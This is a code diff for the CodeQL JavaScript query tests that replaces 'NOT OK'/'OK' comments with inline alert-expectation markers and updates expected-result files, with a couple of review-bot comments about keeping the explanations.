+query: Expressions/UnneededDefensiveProgramming.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref index d29916245d6e..85ffff223221 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref @@ -1 +1,2 @@ -Statements/UselessConditional.ql \ No newline at end of file +query: Statements/UselessConditional.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js index 8c61f38d1132..99e77e8cc491 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js @@ -7,5 +7,5 @@ var Mod1; var Mod2; (function (Mod2) { Mod2.p = 42; - })(Mod2 || (Mod2 = {})); // NOT OK + })(Mod2 || (Mod2 = {})); }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js index 913684d6f6aa..1de67b231fa8 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js @@ -20,5 +20,5 @@ if (typeof exports !== 'undefined') { (function(){ var module; - if(typeof module === 'undefined'); // NOT OK + if(typeof module === 'undefined'); // $ Alert[js/unneeded-defensive-code] }); 
diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js index cfc6f1e6df71..adf17a8b3fd0 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js @@ -6,10 +6,10 @@ function getDate() { return null; } console.log(date); - return date && date.getTime(); // NOT OK + return date && date.getTime(); // $ Alert[js/unneeded-defensive-code] } function isNotNullOrString(obj) { - return obj != null && obj != undefined && // NOT OK - typeof obj != 'string'; + return obj != null && obj != undefined && // $ Alert[js/unneeded-defensive-code] + typeof obj != 'string'; } diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js index ace5a3dd7ac8..7b4a4b799e06 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js 
@@ -10,95 +10,95 @@ var o_ = o; var x_ = x; - u_ = u_ || e; // NOT OK - n_ = n_ || e; // NOT OK - o_ = o_ || e; // NOT OK + u_ = u_ || e; // $ MISSING: Alert[js/unneeded-defensive-code] + n_ = n_ || e; // $ MISSING: Alert[js/unneeded-defensive-code] + o_ = o_ || e; // $ MISSING: Alert[js/unneeded-defensive-code] x_ = x_ || e; - u && u.p; // NOT OK - n && n.p; // NOT OK - o && o.p; // NOT OK + u && u.p; // $ Alert[js/unneeded-defensive-code] + n && n.p; // $ Alert[js/unneeded-defensive-code] + o && o.p; // $ Alert[js/unneeded-defensive-code] x && x.p; - u && u(); // NOT OK - n && n(); // NOT OK - o && o(); // NOT OK + u && u(); // $ Alert[js/unneeded-defensive-code] + n && n(); // $ Alert[js/unneeded-defensive-code] + o && o(); // $ Alert[js/unneeded-defensive-code] x && x(); - !u || u.p; // NOT OK - !n || n.p; // NOT OK - !o || o.p; // NOT OK + !u || u.p; // $ Alert[js/unneeded-defensive-code] + !n || n.p; // $ Alert[js/unneeded-defensive-code] + !o || o.p; // $ Alert[js/unneeded-defensive-code] !x || x.p; - !!u && u.p; // NOT OK - !!n && n.p; // NOT OK - !!o && o.p; // NOT OK + !!u && u.p; // $ Alert[js/unneeded-defensive-code] + !!n && n.p; // $ Alert[js/unneeded-defensive-code] + !!o && o.p; // $ Alert[js/unneeded-defensive-code] !!x && x.p; - u != undefined && u.p; // NOT OK - n != undefined && n.p; // NOT OK - o != undefined && o.p; // NOT OK + u != undefined && u.p; // $ Alert[js/unneeded-defensive-code] + n != undefined && n.p; // $ Alert[js/unneeded-defensive-code] + o != undefined && o.p; // $ Alert[js/unneeded-defensive-code] x != undefined && x.p; - u == undefined || u.p; // NOT OK - n == undefined || n.p; // NOT OK - o == undefined || o.p; // NOT OK + u == undefined || u.p; // $ Alert[js/unneeded-defensive-code] + n == undefined || n.p; // $ Alert[js/unneeded-defensive-code] + o == undefined || o.p; // $ Alert[js/unneeded-defensive-code] x == undefined || x.p; - u === undefined || u.p; // NOT OK - n === undefined || n.p; // NOT OK - o === undefined || 
o.p; // NOT OK + u === undefined || u.p; // $ Alert[js/unneeded-defensive-code] + n === undefined || n.p; // $ Alert[js/unneeded-defensive-code] + o === undefined || o.p; // $ Alert[js/unneeded-defensive-code] x === undefined || x.p; - if (u) { // NOT OK + if (u) { // $ Alert[js/unneeded-defensive-code] u.p; } - if (n) { // NOT OK + if (n) { // $ Alert[js/unneeded-defensive-code] n.p; } - if (o) { // NOT OK + if (o) { // $ Alert[js/unneeded-defensive-code] o.p; } if (x) { x.p; } - u? u():_; // NOT OK - n? n(): _; // NOT OK - o? o(): _; // NOT OK + u? u():_; // $ Alert[js/unneeded-defensive-code] + n? n(): _; // $ Alert[js/unneeded-defensive-code] + o? o(): _; // $ Alert[js/unneeded-defensive-code] x? x(): _; - if (u !== undefined) { // NOT OK + if (u !== undefined) { // $ Alert[js/unneeded-defensive-code] u.p; } - if (n !== undefined) { // NOT OK + if (n !== undefined) { // $ Alert[js/unneeded-defensive-code] n.p; } - if (o !== undefined) { // NOT OK + if (o !== undefined) { // $ Alert[js/unneeded-defensive-code] o.p; } if (x !== undefined) { x.p; } - if (u == undefined){} // NOT OK - if (n == undefined){} // NOT OK - if (o == undefined){} // NOT OK + if (u == undefined){} // $ Alert[js/unneeded-defensive-code] + if (n == undefined){} // $ Alert[js/unneeded-defensive-code] + if (o == undefined){} // $ Alert[js/unneeded-defensive-code] if (x == undefined){} - if (u != undefined){} // NOT OK - if (n != undefined){} // NOT OK - if (o != undefined){} // NOT OK + if (u != undefined){} // $ Alert[js/unneeded-defensive-code] + if (n != undefined){} // $ Alert[js/unneeded-defensive-code] + if (o != undefined){} // $ Alert[js/unneeded-defensive-code] if (x != undefined){} - if (typeof u === "undefined"){} // NOT OK - if (typeof n === "undefined"){} // NOT OK - if (typeof o === "undefined"){} // NOT OK + if (typeof u === "undefined"){} // $ Alert[js/unneeded-defensive-code] + if (typeof n === "undefined"){} // $ Alert[js/unneeded-defensive-code] + if (typeof o === 
"undefined"){} // $ Alert[js/unneeded-defensive-code] if (typeof x === "undefined"){} function f() { } - typeof f === "function" && f(); // NOT OK - typeof u === "function" && u(); // NOT OK + typeof f === "function" && f(); // $ Alert[js/unneeded-defensive-code] + typeof u === "function" && u(); // $ Alert[js/unneeded-defensive-code] typeof x === "function" && x(); var empty_array = []; @@ -111,9 +111,9 @@ var _true = true; var _false = false; - empty_array && empty_array.pop(); // NOT OK - pseudo_empty_array && pseudo_empty_array.pop(); // NOT OK - non_empty_array && non_empty_array.pop(); // NOT OK + empty_array && empty_array.pop(); // $ Alert[js/unneeded-defensive-code] + pseudo_empty_array && pseudo_empty_array.pop(); // $ Alert[js/unneeded-defensive-code] + non_empty_array && non_empty_array.pop(); // $ Alert[js/unneeded-defensive-code] empty_string && empty_string.charAt(0); non_empty_string && non_empty_string.charAt(0); zero && zero(); 
@@ -121,23 +121,23 @@ _true && _true(); _false && _false(); - (u !== undefined && u !== null) && u.p; // NOT OK - u !== undefined && u !== null && u.p; // NOT OK + (u !== undefined && u !== null) && u.p; // $ Alert[js/unneeded-defensive-code] + u !== undefined && u !== null && u.p; // $ Alert[js/unneeded-defensive-code] - u != undefined && u != null; // NOT OK - u == undefined || u == null; // NOT OK - u !== undefined && u !== null; // NOT OK - !(u === undefined) && !(u === null); // NOT OK - u === undefined || u === null; // NOT OK - !(u === undefined || u === null); // NOT OK - !(u === undefined) && u !== null; // NOT OK + u != undefined && u != null; // $ Alert[js/unneeded-defensive-code] + u == undefined || u == null; // $ Alert[js/unneeded-defensive-code] + u !== undefined && u !== null; // $ Alert[js/unneeded-defensive-code] + !(u === undefined) && !(u === null); // $ Alert[js/unneeded-defensive-code] + u === undefined || u === null; // $ Alert[js/unneeded-defensive-code] + !(u === undefined || u === null); // $ Alert[js/unneeded-defensive-code] + !(u === undefined) && u !== null; // $ Alert[js/unneeded-defensive-code] u !== undefined && n !== null; - u == undefined && u == null; // NOT OK + u == undefined && u == null; // $ Alert[js/unneeded-defensive-code] x == undefined && x == null; - x === undefined && x === null; // NOT OK + x === undefined && x === null; // $ Alert[js/unneeded-defensive-code] if (x === undefined) { - if (x === null) { // NOT OK + if (x === null) { // $ Alert[js/unneeded-defensive-code] } } 
@@ -153,16 +153,16 @@ } } - x != undefined && x != null; // NOT OK + x != undefined && x != null; // $ Alert[js/unneeded-defensive-code] if (x != undefined) { - if (x != null) { // NOT OK + if (x != null) { // $ Alert[js/unneeded-defensive-code] } } - if (typeof x !== undefined); - if (typeof window !== undefined); + if (typeof x !== undefined); // $ Alert[js/comparison-between-incompatible-types] + if (typeof window !== undefined); // $ Alert[js/comparison-between-incompatible-types] if (typeof x !== x); - if (typeof x !== u); // NOT OK + if (typeof x !== u); // $ Alert[js/comparison-between-incompatible-types] if (typeof window !== "undefined"); if (typeof module !== "undefined"); @@ -172,12 +172,12 @@ if (typeof module !== "undefined" && module.exports); if (typeof global !== "undefined" && global.process); - u && (f(), u.p); - u && (u.p, f()); // technically not OK, but it seems like an unlikely pattern - u && !u.p; // NOT OK - u && !u(); // NOT OK + u && (f(), u.p); // $ Alert[js/trivial-conditional] + u && (u.p, f()); // $ Alert[js/trivial-conditional] - technically not OK, but it seems like an unlikely pattern + u && !u.p; // $ Alert[js/unneeded-defensive-code] + u && !u(); // $ Alert[js/unneeded-defensive-code] + - function hasCallbacks(success, error) { if (success) success() if (error) error() diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js index 588844f9c75f..eb0dee8c535e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js @@ -1,7 +1,7 @@ (function(){ var v; (function(){ - if(typeof v === "undefined"){ // NOT OK + if(typeof v === "undefined"){ // $ Alert[js/unneeded-defensive-code] v = 42; } for(var v in x){ 
@@ -9,10 +9,10 @@ }); }); -const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; // OK +const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; function f(v) { - if (typeof v === 'undefined' && v !== undefined) { // OK + if (typeof v === 'undefined' && v !== undefined) { doSomething(v); } } diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected index 81cd1fac8fd5..82d959bca090 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:16 | x + x>>1 | Whitespace around nested operators contradicts precedence. | | tst.js:42:9:42:20 | p in o&&o[p] | Whitespace around nested operators contradicts precedence. | -| tst.js:49:1:49:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | +| tst.js:48:1:48:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref index 4905e880b56a..b1d60a5feea0 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref @@ -1 +1,2 @@ -Expressions/WhitespaceContradictsPrecedence.ql \ No newline at end of file +query: Expressions/WhitespaceContradictsPrecedence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index d9942a5ec4a8..30b75270f946 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -1,35 +1,35 @@ function bad(x) { - return x + x>>1; + return x + x>>1; // $ Alert } function ok1(x) { - return x + x >> 1; + return x + x >> 1; } function ok2(x) { - return x+x >> 1; + return x+x >> 1; } function ok3(x) { - return x + (x>>1); + return x + (x>>1); } function ok4(x, y, z) { return x + y + z; } - + function ok5(x, y, z) { return x + y+z; } function ok6(x) { - return x + x>> 1; + return x + x>> 1; } function ok7(x, y, z) { return x + y - z; } - + function ok8(x, y, z) { return x + y-z; } @@ -38,18 +38,17 @@ function ok9(x, y, z) { return x * y*z; } -function ok10(o, p) { - return p in o&&o[p]; +function bad10(o, p) { + return p in o&&o[p]; // $ Alert } -// OK + x==y ** 2; -// NOT OK -x + x >> 1 +x + x >> 1 // $ Alert + -// OK x + x >> 1 -// OK (asm.js-like) -x = x - 1|0; \ No newline at end of file +// OK - asm.js-like +x = x - 1|0; diff --git a/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref b/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref index 13e42724d606..478f17148e10 100644 --- a/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref +++ b/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref @@ -1 +1 @@ -JSDoc/BadParamTag.ql \ No newline at end of file +query: JSDoc/BadParamTag.ql diff --git a/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref b/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref index 05473298ac8d..75206f43fafb 100644 
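Review bot: Near the end of the second hunk (`@@ -38,18 +38,17 @@`), two statements print as `x + x >> 1`; one gets `// $ Alert` and the other loses its `// OK` with nothing in its place. They presumably differ only in whitespace, which is collapsed on this page, so a reader of the test file can no longer see why the second one is expected to be clean. The last statement keeps its reason as `// OK - asm.js-like`; the same form would fit here, e.g. `// OK - <why this spacing is accepted>` above the unflagged line.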
--- a/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref
+++ b/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref
@@ -1 +1 @@
-JSDoc/JSDocForNonExistentParameter.ql
\ No newline at end of file
+query: JSDoc/JSDocForNonExistentParameter.ql
diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected
index 6b028267ff76..4ed958a048a1 100644
--- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected
+++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected
@@ -1,2 +1,2 @@
-| tst.js:6:15:6:15 | y | Parameter y is not documented. |
-| tst.js:26:19:26:19 | y | Parameter y is not documented. |
+| tst.js:4:15:4:15 | y | Parameter y is not documented. |
+| tst.js:23:19:23:19 | y | Parameter y is not documented. |
diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref
index 8c3b2613cba3..d6b0343c6c02 100644
--- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref
+++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref
@@ -1 +1,2 @@
-JSDoc/UndocumentedParameter.ql
\ No newline at end of file
+query: JSDoc/UndocumentedParameter.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js
index b785e06507a7..6143b7084c3b 100644
@@ -1,9 +1,7 @@ /** - * NOT OK: Parameter y is not documented. - * * @param x The first operand. */ -function f(x, y) { +function f(x, y) { // $ Alert return x+y; } @@ -14,7 +12,6 @@ function g(x, y) { return x+y; } -// NOT OK /** * @param {int} x * @param {float} y @@ -23,6 +20,6 @@ var o = { /** * @param {String} x first argument. */ - f : function(x, y) { + f : function(x, y) { // $ Alert } }; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref index 6f22e925dbd1..fd66fb21e620 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref @@ -1 +1,2 @@ -LanguageFeatures/ArgumentsCallerCallee.ql \ No newline at end of file +query: LanguageFeatures/ArgumentsCallerCallee.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js index 32b12e606bc6..d988977efdd8 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js @@ -1,7 +1,7 @@ (function (i) { if (i <= 1) return 1; - return i*arguments.callee(i-1); + return i*arguments.callee(i-1); // $ Alert }(3)); function f() { @@ -9,7 +9,7 @@ function f() { } function g() { - return arguments.caller.length; + return arguments.caller.length; // $ Alert } function h(arguments) { diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected index bffe622dc7e0..7be415438250 100644 
--- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected
@@ -1,3 +1,3 @@
-| tst.js:2:1:2:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:2:14:2:20 | 'array' | array |
-| tst.js:19:9:19:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:23:6:23:11 | 'null' | null |
-| tst.js:33:2:33:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:33:16:33:22 | 'array' | array |
+| tst.js:1:1:1:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:1:14:1:20 | 'array' | array |
+| tst.js:18:9:18:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:21:6:21:11 | 'null' | null |
+| tst.js:30:2:30:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:30:16:30:22 | 'array' | array |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref
index ebbb3c84a1e5..9ed7fa52f7cc 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref
+++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref
@@ -1 +1,2 @@
-LanguageFeatures/BadTypeof.ql
\ No newline at end of file
+query: LanguageFeatures/BadTypeof.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js
index de01c66ac808..9401c80cba52 100644
+++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js @@ -1,36 +1,33 @@ -// NOT OK -typeof a === 'array'; +typeof a === 'array'; // $ Alert + -// OK typeof b == 'string'; -// OK + typeof c != "string"; -// OK + "number" !== typeof 23; -// OK + 'object' == typeof null; -// OK + typeof es6 === 'symbol'; -switch (typeof a) { -// OK +switch (typeof a) { // $ Alert + case 'undefined': -// NOT OK case 'null': } -// OK + switch (msg) { case 'null': case typeof a: } -// NOT OK -(typeof a) === 'array'; +(typeof a) === 'array'; // $ Alert // JScript extensions typeof a === 'unknown' || typeof a === 'date'; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref index 8c331480b29c..908167804bcb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref @@ -1 +1 @@ -LanguageFeatures/ConditionalComments.ql +query: LanguageFeatures/ConditionalComments.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref index 6ec39aa879d7..ba16fbb07ece 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref @@ -1 +1,2 @@ -LanguageFeatures/DebuggerStatement.ql +query: LanguageFeatures/DebuggerStatement.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js index b456e6b2b1d4..7c4a7fb098ef 100644 
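Review bot: In the `switch (typeof a) {` block the expectation moves to the `switch` line while the `// NOT OK` that marked `case 'null':` is removed, so the file no longer says which case makes the comparison impossible. BadTypeof.expected reports the alert on `typeof a` with `'null'` as the related location, so the placement looks right. A trailing note would keep the intent next to the marker: `switch (typeof a) { // $ Alert - 'null' below can never match`.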
--- a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js @@ -1,3 +1,3 @@ function sayHello() { - debugger; + debugger; // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref index 0da47afc6a0e..70d65313b52a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref @@ -1 +1,2 @@ -LanguageFeatures/DeleteVar.ql \ No newline at end of file +query: LanguageFeatures/DeleteVar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js index 1641372a53cc..8a6a7613d7a7 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js @@ -1,8 +1,8 @@ delete this.Object; -delete String; +delete String; // $ Alert function f(o, x) { delete o.p; delete o[x]; - delete x; + delete x; // $ Alert delete (o.p); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref index f4decec514b3..142d91688dae 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref @@ -1 +1,2 @@ -LanguageFeatures/EmptyArrayInit.ql \ No newline at end of file +query: LanguageFeatures/EmptyArrayInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js index 69daffb8a0b0..cf64a97a4d10 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js @@ -1,7 +1,7 @@ -var a = [], // OK - b = [1], // OK - c = [1, 2], // OK - d = [1, , 2], // NOT OK - e = [1,], // OK - f = [1, 2, ,], // NOT OK - g = [,1]; // NOT OK +var a = [], + b = [1], + c = [1, 2], + d = [1, , 2], // $ Alert + e = [1,], + f = [1, 2, ,], // $ Alert + g = [,1]; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref b/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref index 65753c6e2076..f6cdc87d5359 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref @@ -1 +1,2 @@ -LanguageFeatures/Eval.ql +query: LanguageFeatures/Eval.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js b/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js index 54ab88cd23e3..7845f9f07460 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js @@ -1,4 +1,4 @@ function sayHello() { - eval("2+2"); + eval("2+2"); // $ Alert anotherFunction("2+2"); } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected index f3c95f56d3d2..01e87bf5c177 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected 
@@ -3,4 +3,4 @@ | letExpr.js:3:13:3:38 | let (x ... ) x + y | Use let declarations instead of let expressions. | | letStmt.js:3:1:5:1 | let (x ... + y);\\n} | Use let declarations instead of let statements. | | postfixComprehension.js:2:15:2:38 | [i*i fo ... mbers)] | Use prefix comprehensions instead of postfix comprehensions. | -| tst.js:2:15:2:31 | function(x) x * x | Use arrow expressions instead of expression closures. | +| tst.js:1:15:1:31 | function(x) x * x | Use arrow expressions instead of expression closures. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref index 422b2aeab8ee..ab1619db7165 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref @@ -1 +1,2 @@ -LanguageFeatures/ExpressionClosures.ql \ No newline at end of file +query: LanguageFeatures/ExpressionClosures.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js index 1df300534371..2f22bc5dce39 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js @@ -3,6 +3,6 @@ var obj = {prop1: 5, prop2: 13, prop3: 8}; for each (var item in obj) { sum += item; -} +} // $ Alert console.log(sum); // logs "26", which is 5+13+8 diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js index 0f6a81c8fb36..7b85bc8720f3 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js 
